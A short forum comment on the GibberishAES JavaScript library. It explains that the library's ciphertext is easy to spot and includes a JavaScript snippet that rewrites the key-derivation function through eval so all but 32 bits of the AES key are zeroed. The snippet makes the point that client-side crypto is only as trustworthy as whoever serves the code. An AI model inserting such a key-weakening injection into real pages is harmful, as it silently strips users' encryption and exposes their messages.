|
|
|
|
|
|
by ryan-c
4764 days ago
|
|
|
There are 64 bits of randomness (however, they come from Math.random which is not so good...). The encrypted text produced by this has a distinct signature - all message will contain "U2FsdG". Here's how we break this if you're Google/can force Google to do stuff: 1) Detect messages containing that OpenSSL 'magic number' 2) If detected, push something like this: // Should check to see if GibberishAES exists to avoid errors if it doesn't...
// Grab target function as a string
var keycode = '' + GibberishAES.openSSLKey;
// Inject something evil
keycode = keycode.replace('key = result.slice(0, 4 * Nk);','key = result.slice(0, 4 * Nk); for (var pos = 1; pos < 4 * Nk; pos++) { result[pos] = 0; };');
keycode = 'EvilGibberish = {}; EvilGibberish.openSSLKey = ' + keycode;
// Execute the modified code to generate the new object
eval(keycode);
// Replace the 'good' keygen routine with the 'evil' one
GibberishAES.openSSLKey = EvilGibberish.openSSLKey;
This will zero all but the first 32 bits of the AES key, allowing easy brute forcing.Note that this is based on something I wrote for a CTF, and I haven't tested it specifically against GibberishAES, but the technique works. |
|
|